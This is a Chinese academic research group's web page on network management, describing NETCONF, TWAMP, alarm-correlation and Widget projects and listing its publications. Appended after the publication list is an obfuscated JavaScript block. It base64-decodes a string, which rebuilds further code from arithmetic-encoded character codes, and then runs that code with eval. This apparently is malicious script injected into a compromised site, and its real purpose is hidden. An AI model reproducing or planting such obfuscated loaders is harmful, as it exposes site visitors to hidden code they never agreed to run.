网络管理

网络管理小组的研究方向主要包括:新兴网络管理协议性能实现及关键技术研究;模式识别、数据挖掘等智能技术在网络运行数据监控方面的应用;网络故障和网络告警的关联性、相关性分析及快速定位;传感网络数据挖掘与处理等其它网络和网络管理新兴技术的研究。
网络管理小组与华为技术有限公司、中兴通讯有限公司、工信部电信研究院标准化研究所、IBM中国研究院、中国网通研究院等业界知名企业和研究机构开展长期合作,推进了NETCONF协议原型实现与关键技术、NETCONF访问控制机制、智能化告警关联、网络故障关联、Widget关键技术等一系列项目研究。

项目介绍

●NETCONF原型实现与关键技术研究
本项目为华为技术有限公司委托开发项目,设计实现完全支持NETCONF协议的原型系统,并研究和优化NETCONF协议实现关键技术。从开发角度、运行性能、管理员使用等角度对比不同建模方法、不同建模语言、不同建模结构、不同查询方法的优劣,提出并验证相应的改进方案。项目成果已提交自主专利和IETF draft,并发表相关EI检索论文。

●NETCONF访问控制机制的设计和验证
本项目为华为基金资助项目,利用已开发完成的NETCONF原型系统平台作为基础平台,实现现有若干访问控制机制,并从不同角度进行总结对比分析,以发现不同访问控制机制的优劣。并在此基础上结合NETCONF及网络管理数据模型的特征,对已有机制提出改进方法、并设计全新的机制,并付诸原型实现。

●网络故障关联模式的仿真分析与研究
本项目与IBM中国研究院(IBM-CRL)合作,针对VoIP业务需要,分析设计不同类型、不同协议配置、不同网元规模的IP电话网网络仿真模型;运用网络仿真工具,完成不同网络故障情境下网络层设备性能、性能降级的实时监控和监控数据收集,运用模式识别、数据挖掘、统计分析等技术对仿真数据进行处理,以发现网络性能与网络故障之间的关联模式。

●基于数据挖掘的智能化告警关联关键技术

本项目与IBM中国研究院(IBM-CRL)联合研究完成,实现了一个适用于大规模电信网络和海量数据应用环境下的智能化实时故障诊断、影响分析和故障定位系统。该系统采用创新的方法和技术,进一步提高告警分析的速度、精度,减少对人工专家知识的依赖,最终提高故障定位的准确性和效率。

●IP网络及业务测试系统

本项目为工信部电信研究院标准化研究所委托开发项目,设计实现完全支持TWAMP测试协议的原型系统,该系统具有独立或与其它现网业务系统配合,完成网络层及互联网业务性能测试的功能。系统包含三种类型的功能模块:控制服务器、数据库服务器、探针(测量点)。

●WEB Widget的关键技术、架构及应用情况
本项目为中兴通讯股份有限公司委托项目,深入研究了目前主要的热门的开源Web Widget引擎、Widget标准情况;对目前主流WEB Widget引擎的Widget开发规范、功能、架构、开发环境、应用情况进行了对比分析;剖析运行在不同终端(手机,机顶盒),采用不同技术(GUI,WEB)的Widget引擎,对Widget引擎的主要技术进行分析。成果已提交研究报告,并完成相关论文两篇。

●移动Widget的关键技术和主流Widget标准、引擎和转换技术
本项目为中兴通讯股份有限公司委托开发项目,在对主流Widget标准(包括Nokia S60 WRT 1.1、Windows Mobile 6.5 Widget、Opera Widget和JIL Widget)在配置文件、文件结构、API、标签等方面的差异分析的基础上,提供Widget 统一的JS和TAG中间库,可支持实现将按照中间库开发的Widget JS代码通过开发环境封装到上述平台上,提供TAG转换工具将代码中的TAG转换到目标平台;实现Widget的两种终端屏幕大小适配,适配对象包括TAG和JS中的图片、控件、文字,适配对象属性包括位置,字体,尺寸;并提供如何进一步向多种终端屏幕适配的说明文档。

●IPTV Widget运行环境测试
本项目为中兴通讯股份有限公司提供设备完成, 采用SKYEYE等现有测试技术对IPTV Widget运行环境进行测试,通过软件模拟IPTV机顶盒的硬件环境,并在其上安装Linux操作系统和2-3种Widget运行环境,提供Widget运行效果与相关硬件环境的数据;并提供试验数据的分析结论。

论文发表

1) IMPROVEMENT OF XACML ACCESS CONTROL MECHANISM BASED ON NETCONF SUBTREE FILTERING RPC. Jinjin Wang, Bin Zhang, Guohui Li,Yan Li,Xuesong Gao 2010 2nd IEEE International Conference on Network Infrastructure and Digital Content (IC-NIDC2010)
2)  Fast Authorization of XACML Access Control on NETCONF Platform. Yexiang Liu, Bin Zhang, Guohui Li, Jun guo. Conference:International Conference on Advanced Intelligence and Awareness Internet, 2010.
3) Probe Management of TWAMP on Large Network. Lekai Liu, Bin Zhang, and Guohui Li, Baohong He, Shu Liu. The 2nd International Symposium on Computer Network and Multimedia Technology (CNMT), 2010.
4) Architecture of Centralized Access Control Proxy Server based on NETCONF. Feng Wang, Bin Zhang, Guohui Li, Jun Guo, Yan Li and Xuesong Gao International Conference on Measuring Technology and Mechatronics Automation   (ICMTMA2010)
5) Association Pattern Recognization by Simulation between performance and faults in MAN. Fengxin Jin, Bin Zhang, Guohui Li. 2010 2nd International Asia Conference on Informatics in Control, Automation and Robotics (CAR 2010)
6) The Application and Analysis of Netconf Subtree Filtering based on SAX and DOM. Yazhou Xiang, Bin Zhang, Guohui Li,Yan Li,Xuesong Gao.International conference on measuring technology and mechatronics automation, 2010  
7) The Comparison and Analysis of Tree Data Model and Table-Like Data Model Based on NETCONF. Yanxiang Gao, Bin Zhang, Guohui Li . 2010 2nd International Asia Conference on Informatics in Control, Automation and Robotics
8) The Implementation and Analysis of the Translation from Subtree Filtering to XPath. Yonghao Shen, Bin Zhang, Guohui Li ,科技论文在线,2009
9) The Implementation and Comparison Analysis of Subtree Filtering and XPath Capability in NETCONF. Zhichao Yang,Bin Zhang, Guohui Li . the 2009 IEEE International Conference on Network Infrastructure and Digital Content . 2009
10) Analysis and Research of Association Pattern Between Network Performances and Faults In VoIP Network. Chuanmei Wang,Bin Zhang, Guohui Li . the 2009 IEEE International Conference on Network Infrastructure and Digital Content.
11) Challenges to the New Network Management Protocol: NETCONF. Ji Huang, Bin Zhang. 2009 International Symposium on Education and Computer Science (ECS2009)
12) Contrast Analysis of NETCONF Modeling Languages: XML Schema, Relax NG and YANG. Huiyang Cui, Bin Zhang, Guohui Li. 2009 International Conference on Communication Software and Networks(ICCSN 2009)
13) A Topological Constraints Based Sequential Data Mining Approach on Telecom Networks Alarm. Zhaogang Wang, Bin Zhang, Guohui Li. 2009 IEEE International Workshop on Data Mining with Its Application In Telecom Industry (DMTI2009)
14) Network Topology Constraint Based Transaction Separation and Mining Algorithm of Telecom Alarm. JunChen, BinZhang. 2008 KAM Colloquium on Computer, Communication, Control and Automation
15)  The Implementation and Analysis of the Monitoring Module based on NETCONF. RuiWang, BinZhang.  2008 International Symposium on Computer Science and Computational Technology (ISCSCT 2008)

var AHWSYAEAFT = atob(‘dmFyIFZFUktPWUNXT1EgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE5IC0gOSwgMTIwIC0gMiwgMTAwIC0gMywgMTE5IC0gNSwgNDAgLSA4LCAxMTMgLSA2LCAxMDggLSA3LCAxMjYgLSA1LCAzMyAtIDEsIDY3IC0gNiwgNDEgLSA5LCA0MyAtIDQsIDkzIC0gNSwgOTUgLSA1LCAxMjUgLSA1LCA4MyAtIDQsIDEyMSAtIDgsIDExMSAtIDgsIDkzIC0gNywgMTE3IC0gNywgNzUgLSAxLCA3MiAtIDIsIDQ2IC0gNywgNjcgLSA4LCAxNiAtIDYsIDEyNCAtIDYsIDk4IC0gMSwgMTE1IC0gMSwgMzQgLSAyLCAxMDcgLSA2LCAxMTkgLSA5LCAxMDIgLSAzLCAxMDcgLSA2LCAxMDYgLSA2LCAzNiAtIDQsIDY4IC0gNywgMzQgLSAyLCA0NCAtIDUsIDgzIC0gMywgNzIgLSA0LCA4NiAtIDEsIDEwMyAtIDUsIDgyIC0gMywgMTA2IC0gMiwgMTI3IC0gOCwgNzQgLSA3LCA4NyAtIDgsIDc1IC0gOSwgMTIwIC0gOCwgMTEyIC0gNSwgODIgLSA1LCA5MiAtIDksIDExOSAtIDgsIDEyNCAtIDIsIDc1IC0gNywgNzIgLSA1LCAxMTggLSA2LCA5NSAtIDUsIDgzIC0gMiwgNzMgLSAyLCAxMTcgLSA2LCAxMDIgLSAyLCA4MyAtIDgsIDkzIC0gOSwgODYgLSA1LCAxMjIgLSAyLCA4MiAtIDcsIDEwNCAtIDEsIDEyOSAtIDksIDEyMCAtIDIsIDczIC0gNywgODYgLSA0LCA1MyAtIDEsIDExMiAtIDMsIDcyIC0gNSwgNTUgLSA0LCAxMDQgLSA0LCAxMTYgLSA5LCA3OCAtIDIsIDcwIC0gMiwgNjEgLSA1LCA2NyAtIDIsIDgxIC0gMiwgNTUgLSA2LCA1OCAtIDYsIDg2IC0gOCwgODYgLSA4LCAxMjEgLSAxLCAxMTEgLSA4LCAxMTcgLSAzLCA4NSAtIDcsIDg4IC0gNCwgMTIyIC0gNywgMTE0IC0gMywgNzEgLSAyLCA4NiAtIDIsIDY0IC0gOCwgNzEgLSAxLCA4NiAtIDQsIDk2IC0gOCwgOTcgLSA4LCAxMDQgLSA0LCA4MyAtIDQsIDc1IC0gOCwgODkgLSAzLCAxMTUgLSA3LCAxMDcgLSA2LCA3MCAtIDQsIDcyIC0gNywgNTggLSAzLCA3MSAtIDUsIDg2IC0gNCwgMTA4IC0gOCwgMTIzIC0gOCwgODcgLSA2LCA5NCAtIDcsIDk0IC0gOSwgMTI1IC0gNCwgNzcgLSAyLCAxMDkgLSAzLCAxMTkgLSA0LCAxMDkgLSA4LCA3OCAtIDMsIDkxIC0gOSwgMTEyIC0gOSwgNzEgLSAyLCA4NCAtIDYsIDEyNiAtIDYsIDU4IC0gNiwgMTEzIC0gNywgOTkgLSAyLCA3MyAtIDUsIDk4IC0gOSwgNTcgLSA3LCA4OCAtIDIsIDEzMSAtIDksIDEyMiAtIDMsIDc5IC0gOSwgNzUgLSA5LCAxMTIgLSA3LCA4MiAtIDksIDc3IC0gNSwgODIgLSA3LCA5MSAtIDQsIDExNiAtIDksIDU3IC0gOCwgODUgLSA2LCAxMjUgLSA1LCA3NyAtIDgsIDExMCAtIDYsIDk0IC0gNiwgMTIzIC0gNCwgNDkgLSAxLCAxMTYgLSA4LCA5MCAtIDYsIDgwIC0gOCwgODQgLSAyLCA2MiAtIDgsIDEwMiAtIDIsIDEyNiAtIDUsIDEwOSAtIDIsIDk5IC0gMSwgODQgLSA0LCA5MCAtIDgsIDExMiAtIDksIDkyIC0gNCwgODIgLSA5LCAxMTcgLSA5LCA2OCAtIDIsIDExOSAtIDMsIDEwMSAtIDMsIDU4IC0gOCwgODcgLSA5LCA4OCAtIDcsIDQ0IC0gNSwgNjIgLSAzLCAxMSAtIDEsIDEwOSAtIDcsIDEyMyAtIDYsIDExMiAtIDIsIDEwMyAtIDQsIDExOSAtIDMsIDEwNiAtIDEsIDExMyAtIDIsIDExNSAtIDUsIDMzIC0gMSwgMTI4IC0gOCwgMTE5IC0gOCwgMTIzIC0gOSwgMTA0IC0gOSwgMTA0IC0gMywgMTE3IC0gNywgMTAyIC0gMywgNDcgLSA3LCAxMjEgLSA2LCAxMTkgLSAzLCAxMjEgLSA3LCAxMDkgLSA0LCAxMTMgLSAzLCAxMDkgLSA2LCA1MSAtIDcsIDQwIC0gOCwgMTExIC0gNCwgMTA1IC0gNCwgMTI2IC0gNSwgNDYgLSA1LCAzNiAtIDQsIDEzMSAtIDgsIDEyIC0gMiwgMzkgLSA3LCAzOSAtIDcsIDEyNSAtIDcsIDEwMiAtIDUsIDEyMSAtIDcsIDM3IC0gNSwgMTIxIC0gNywgMTA5IC0gOCwgMTIxIC0gNiwgMzQgLSAyLCA2MiAtIDEsIDM5IC0gNywgNDIgLSAzLCA0OCAtIDksIDY1IC0gNiwgMTUgLSA1LCAzOCAtIDYsIDMzIC0gMSwgMTA4IC0gNiwgMTIwIC0gOSwgMTE5IC0gNSwgMzQgLSAyLCA0MSAtIDEsIDEyNSAtIDcsIDEwNCAtIDcsIDExNiAtIDIsIDM1IC0gMywgMTEyIC0gNywgNDAgLSA4LCA2NSAtIDQsIDM0IC0gMiwgNDkgLSAxLCA2OCAtIDksIDM4IC0gNiwgMTEwIC0gNSwgMzggLSA2LCA2OSAtIDksIDM3IC0gNSwgMTE3IC0gMiwgMTIxIC0gNSwgMTIzIC0gOSwgMTA5IC0gNCwgMTEzIC0gMywgMTA4IC0gNSwgNDggLSAyLCAxMTMgLSA1LCAxMDkgLSA4LCAxMTEgLSAxLCAxMDkgLSA2LCAxMTkgLSAzLCAxMDcgLSAzLCA2MCAtIDEsIDQxIC0gOSwgMTA4IC0gMywgNDkgLSA2LCA0NyAtIDQsIDQ2IC0gNSwgMzggLSA2LCAxMzAgLSA3LCAxNSAtIDUsIDM5IC0gNywgMzcgLSA1LCAzNCAtIDIsIDM0IC0gMiwgMTIyIC0gOCwgMTA3IC0gNiwgMTI0IC0gOSwgNDEgLSA5LCA0OSAtIDYsIDYzIC0gMiwgMzYgLSA0LCA4OSAtIDYsIDEyMSAtIDUsIDEyMyAtIDksIDEwNiAtIDEsIDExNCAtIDQsIDExMiAtIDksIDUzIC0gNywgMTA5IC0gNywgMTIxIC0gNywgMTE1IC0gNCwgMTE1IC0gNiwgNzQgLSA3LCAxMDcgLSAzLCA5OCAtIDEsIDEyMyAtIDksIDc1IC0gOCwgMTE5IC0gOCwgMTAyIC0gMiwgMTA5IC0gOCwgNDUgLSA1LCAxMTkgLSA0LCAxMjMgLSA3LCAxMTcgLSAzLCAxMTMgLSA4LCAxMTkgLSA5LCAxMDQgLSAxLCA0OCAtIDIsIDEwMyAtIDQsIDExMiAtIDgsIDEwMSAtIDQsIDEyMiAtIDgsIDY4IC0gMSwgMTE3IC0gNiwgMTA4IC0gOCwgMTEwIC0gOSwgNjYgLSAxLCAxMjAgLSA0LCA0NSAtIDUsIDExMCAtIDUsIDQ4IC0gNywgNDEgLSA5LCA5OCAtIDQsIDE4IC0gOCwgMTAgLSAxLCAxOCAtIDksIDEzIC0gNCwgMTggLSA5LCAxMTMgLSA2LCAxMDMgLSAyLCAxMjcgLSA2LCA0NyAtIDEsIDEwMCAtIDEsIDExMSAtIDcsIDEwMiAtIDUsIDEyMiAtIDgsIDc0IC0gNywgMTE2IC0gNSwgMTA4IC0gOCwgMTA2IC0gNSwgNzMgLSA4LCAxMjAgLSA0LCA0MiAtIDIsIDEwOSAtIDQsIDM2IC0gNCwgNDUgLSA4LCA0MCAtIDgsIDEwOCAtIDEsIDEwNCAtIDMsIDEyOCAtIDcsIDQ5IC0gMywgMTE0IC0gNiwgMTA3IC0gNiwgMTE0IC0gNCwgMTA5IC0gNiwgMTI1IC0gOSwgMTEwIC0gNiwgNDYgLSA1LCA0MiAtIDEsIDYzIC0gNCwgMTEgLSAxLCA0MCAtIDgsIDMzIC0gMSwgMTMxIC0gNiwgMTYgLSA2LCAzNSAtIDMsIDMzIC0gMSwgMTE1IC0gMSwgMTA0IC0gMywgMTE3IC0gMSwgMTI0IC0gNywgMTE4IC0gNCwgMTE4IC0gOCwgMzQgLSAyLCAxMjAgLSA2LCAxMDcgLSA2LCAxMjIgLSA3LCA2NCAtIDUsIDE1IC0gNSwgMTI3IC0gMiwgMTQgLSA0LCAxNiAtIDYsIDEyNSAtIDcsIDEwNCAtIDcsIDEyMyAtIDksIDM1IC0gMywgMTA4IC0gOCwgMTA2IC0gNSwgMTAyIC0gMywgMzkgLSA3LCA3MCAtIDksIDQxIC0gOSwgMTI3IC0gNywgMTIwIC0gOSwgMTE2IC0gMiwgMTAxIC0gNiwgMTA4IC0gNywgMTE0IC0gNCwgMTAzIC0gNCwgNDggLSA4LCAxMDMgLSA2LCAxMTggLSAyLCAxMTQgLSAzLCAxMDMgLSA1LCA0NSAtIDUsIDEwNiAtIDUsIDExMiAtIDIsIDEwNSAtIDYsIDEwNCAtIDMsIDEwOCAtIDgsIDQ3IC0gNiwgNDYgLSAyLCAzNiAtIDQsIDExMCAtIDMsIDEwNyAtIDYsIDEyMiAtIDEsIDQ4IC0gNywgNjEgLSAyLCAxNCAtIDQsIDQ0IC0gNCwgMTE1IC0gNSwgMTA1IC0gNCwgMTIyIC0gMywgNDAgLSA4LCA3NSAtIDUsIDEyMyAtIDYsIDExMiAtIDIsIDEwNiAtIDcsIDExOSAtIDMsIDEwNiAtIDEsIDExNSAtIDQsIDExNiAtIDYsIDQzIC0gMywgMTA5IC0gOSwgMTAzIC0gMiwgMTA4IC0gOSwgNTAgLSA5LCA0NyAtIDYsIDQ0IC0gNCwgNDIgLSAxLCA2NSAtIDYsIDE5IC0gOSwgMTIgLSAyKTtldmFsKFZFUktPWUNXT1EpOw==’);
eval(AHWSYAEAFT);